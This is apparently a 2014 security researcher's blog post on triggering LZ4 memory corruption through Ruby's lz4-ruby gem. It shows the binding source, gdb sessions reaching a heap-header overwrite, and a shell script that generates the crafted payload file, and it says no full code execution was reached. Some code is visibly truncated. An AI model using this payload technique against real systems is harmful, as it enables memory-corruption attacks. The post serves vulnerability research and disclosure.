Wednesday, July 9, 2014

The LZ4-Ruby Two Hour Challenge

I'm a Ruby Virgin

So, I never found Ruby all that intriguing. It's just not that exciting to me. Sure, I can audit your Ruby on Rails app, but have I ever delved into the internals of Ruby to attack the language, itself? Nope. Not even remotely interested. 

Until today! 

I noticed that Ruby's lz4-ruby package is still vulnerable to the LZ4 memory corruption bug. Since this variant uses the LZ4_decompress_safe routine, I thought it was time to finally dive into the disgusting cesspool that is Ruby. 

I downloaded the latest RVM to my 32bit Debian 7.5.0 test-bed and went for a Polar Bear plunge. After installing the latest version of Ruby (2.1.2p95 2014-05-08 revision 45877) I went to work. 

Having a lot to do today, I only had two hours free to build and write up an attack for this platform. I'm still on the clock, so let's see how much info I can spill in the few minutes I have left. 

To follow along and install the ruby gem, simply run 

$ gem install lz4-ruby 

Once installed, you'll find that the gem can be referenced easily from the Ruby command line "irb". Since irb is horrible, we'll just throw together a quick little script. I'm using the payload from my Python attack as a starting point, so feel free to browse to the script embedded in that blog post in another tab. 

require 'lz4-ruby'

puts "ruby lz4 exploit -"

f ="./ruby.lz4", "r")
d =

$i = 0
while $i < 3 do
        puts "."
        $i += 1


Above is the script I'm using to open and pass my payload to lz4-ruby's uncompress routine. This routine eventually calls our dear old friend LZ4_decompress_safe, which should be invulnerable to our attack! 

donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit -
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `uncompress': Compressed data is maybe corrupted. (LZ4Internal::Error)
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `decompress'
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:36:in `uncompress'
        from ./test.rb:16:in `


Aw, crap! So, I guess it's not vulnerable right off the bat. Analyzing the Ruby bindings shows that there is a funny little attribute of the Ruby platform that is screwing up our attack.

static VALUE lz4internal_uncompress(VALUE self, VALUE input, VALUE in_size, VALUE offset, VALUE out_size) {
  const char *src_p;
  int src_size;

  int header_size;

  VALUE result;
  char *buf;
  int buf_size;

  int read_bytes;

  Check_Type(input, T_STRING);
  src_p = RSTRING_PTR(input);
  src_size = NUM2INT(in_size);

  header_size = NUM2INT(offset);
  buf_size = NUM2INT(out_size);

  result = rb_str_new(NULL, buf_size);
  buf = RSTRING_PTR(result);

  read_bytes = LZ4_uncompress_unknownOutputSize(src_p + header_size, buf, src_size - header_size, buf_size);
  if (read_bytes < 0) {
    rb_raise(lz4_error, "Compressed data is maybe corrupted.");

  return result;

The function above is the Ruby version of the LZ4 bindings, which you can view here on github. Notice the call to 'header_size'. Oddly enough, the Ruby LZ4 bindings have their own concept of a header, which is entirely different to the four byte little-endian header used by every other package (including Python). 

Even more amusing is the fact that the size of the output buffer is a part of the header. The header size is defined by the number of signed bytes at the start of the payload. This is because Ruby is interpreting this value in the payload as a Ruby Integer. This means for each byte with the sign bit set (0x80) it will presume the subsequent byte in the payload is a part of the integer value to be constructed. This is a very common (but annoying) sequence that anyone familiar with ASN.1/etc will recognize instantly. 

So, to tell the Ruby bindings how much string memory to allocate, we simply stuff a large integer into the header of our payload. Because I don't really care about this value and just want a large enough buffer for my payload, I threw in some random crap (mostly due - again - to time). 

donb@debian:~/lz4$ printf "\x80\x81\x82\x7f" > ruby_header.lz4
donb@debian:~/lz4$ cat ruby_header.lz4 test.lz4 > ruby.lz4

Unfortunately, this also fails. Why? Because the LZ4_decompress_safe routine does have one extra check that the LZ4_uncompress function Python uses does not have. It validates that the length of the data to be copied does not exceed the size of the input buffer. We exceed it by just a few bytes in my Python payload, which doesn't matter because of the way LZ4 parses the data. But, the check is a small bump in the road, so we want to avoid it. 

To do so, simply create a footer file that gives us ample room to overwrite whatever the heck we want. As a simple example, I just created an 8k file composed of the letter 'x'.

donb@debian:~/lz4$ perl -e 'print "x" x 8192' > footer.lz4

Crashing LZ4_decompress_safe

So, now we can construct the appropriate payload and be on our way. For simplicity, I adjusted my file to construct the payload "ruby.lz4" by concatenating the header, body, and footer within the script. 

donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit -
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28: [BUG] Segmentation fault at 0xa5afeff8
ruby 2.1.2p95 (2014-05-08 revision 45877) [i686-linux]

Excellent! That's a great start. Let's spin up gdb and see why we're segfaulting. Now, you might have asked yourself "why did he put the while loop with the sleep in the Ruby script?". Now you'll know. 

Because Ruby loads libraries dynamically based on the 'require' statement, this is just a simple way of breaking in the debugger at a point when all requisite libraries should have been loaded. That way, I can simply break in gdb, adjust my next breakpoint, and be on my way. 

donb@deban:~/lz4$ gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
[New Thread 0xb7936b70 (LWP 7161)]
ruby lz4 exploit -
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c

Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {

As you can see above, I simply insert a breakpoint for LZ4_decompress_safe and go on about my business. But, we can notice something is wrong right off the bat. The address in memory passed to the decompression routine as a destination is a bit too "even" for my taste. 

Usually when I see a pointer passed to a function that is an offset of PAGE_SIZE plus eight bytes, I know I'm in the Linux heap. This is a bad thing because the Linux heap is harder to exploit these days than ever. The only realistic attacks that can occur when instrumenting the Linux heap is an attack against the application's logic. And to do this, you'd have to align two pages close together in a predictable way. This requires memory pressure and a lot of other b.s. that I am not going to get into here. 

(gdb) x/8xw dest 
0xa5aff008:     0x00000000      0x00000000      0x00000000      0x00000000
0xa5aff018:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 8
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 16
0xa5afeff8:     Cannot access memory at address 0xa5afeff8

A few simple tests show that I'm right. Valid memory stops at the start of this page. Since we are using a test application, nothing will be in memory prior to that page. 

So, for fun, let's simply corrupt the header of the heap chunk just to prove we can do it reliably. This may not be useful on Linux, but there are a lot of other platforms where this is useful. Remember, Ruby is a high level language and is implemented on a lot of different platforms. So, depending on your target, Your Mileage May Vary. 

To overwrite just the header and not cause a SIGSEGV by writing to an invalid memory page, just increase the address offset in by 8 bytes. This will start the copy of our data at the beginning of the heap chunk, rather than 8 bytes prior to the start of the heap chunk's valid page. 

donb@debian:~/lz4$ ./ 
ruby payload is ready
donb@debian:~/lz4$ !gd
gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run ./test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby ./test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
[New Thread 0xb7936b70 (LWP 7358)]
ruby lz4 exploit -
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) where
#0  LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
#1  0xb7d1b9ac in LZ4_uncompress_unknownOutputSize (maxOutputSize=, isize=16851314, 
    dest=, source=0xb590800c "\017") at lz4.h:245
#2  lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:151
#3  0xb7ee24ad in call_cfunc_4 (func=0xb7d1b8f0 , recv=137898400, argc=4, 
    argv=0xb793705c) at vm_insnhelper.c:1328
#4  0xb7ee63f7 in vm_call_cfunc_with_frame (th=th@entry=0x804abc8, reg_cfp=reg_cfp@entry=0xb79b6f68, 
    ci=ci@entry=0x83a1af0) at vm_insnhelper.c:1470
#5  0xb7ef55a9 in vm_call_cfunc (ci=0x83a1af0, reg_cfp=0xb79b6f68, th=0x804abc8) at vm_insnhelper.c:1560
#6  vm_call_method (th=0x804abc8, cfp=0xb79b6f68, ci=0x83a1af0) at vm_insnhelper.c:1754
#7  0xb7eec630 in vm_exec_core (th=0x804abc8, initial=initial@entry=0) at insns.def:1028
#8  0xb7ef1672 in vm_exec (th=th@entry=0x804abc8) at vm.c:1304
#9  0xb7ef8d11 in rb_iseq_eval_main (iseqval=iseqval@entry=137109680) at vm.c:1562
#10 0xb7d99489 in ruby_exec_internal (n=0xa5aff008) at eval.c:253
#11 0xb7d9af14 in ruby_exec_node (n=n@entry=0x82c20b0) at eval.c:318
#12 0xb7d9cebc in ruby_run_node (n=0x82c20b0) at eval.c:310
#13 0x08048758 in main (argc=2, argv=0xbffff144) at main.c:36
(gdb) break *0xb7d1b9ac
Breakpoint 2 at 0xb7d1b9ac: file lz4ruby.c, line 152.
(gdb) c
Breakpoint 2, lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:152
152       if (read_bytes < 0) {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x082c6fe0      0x44332211      0x75caadde      0x76caadde
0xa5aff010:     0x88776655      0x77caadde      0x78caadde      0x79caadde

It's easy to see in the output above that now we have successfully overwritten the Linux heap header with what *should* be our Python payload, but whatever. 


This is more proof that LZ4 is a fun algorithm to play with. It's a great and useful compression scheme, but the memory corruption overflow is a lot of fun, too. 

If you end up developing a working Ruby LZ4 payload, please reach out and contact Lab Mouse

Time's Up. The adjusted Ruby payload script is below.

Don A. Bailey
Lab Mouse Security
Founder / CEO

# Ruby LZ4 payload generator -
# For Testing Only. Do Not Misuse. 


        printf $1 >> $FILE

        rm -f $FILE
        touch $FILE

        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE

        while [ $i -lt $1 ]; do
                append $2

# initialize the file

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
#append "\xdd"
append "\xe5"

# PyFile_Type technique
# we need 76 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"       # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"       # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# don't exit with a bad ref here
append "\x00\x00"               # null ref

# last literal run (8192 bytes)
append "\xf0"                   # 15 bytes
large 32                        # (32 * 255)
append "\x11"                   # 17 completes the 8192

printf "\x82\x82\x82\x7f" > ruby_header.lz4
perl -e 'print "x" x 8192' > footer.lz4

echo 'ruby payload is ready'
cat ruby_header.lz4 test.lz4 footer.lz4 > ruby.lz4

No comments:

Post a Comment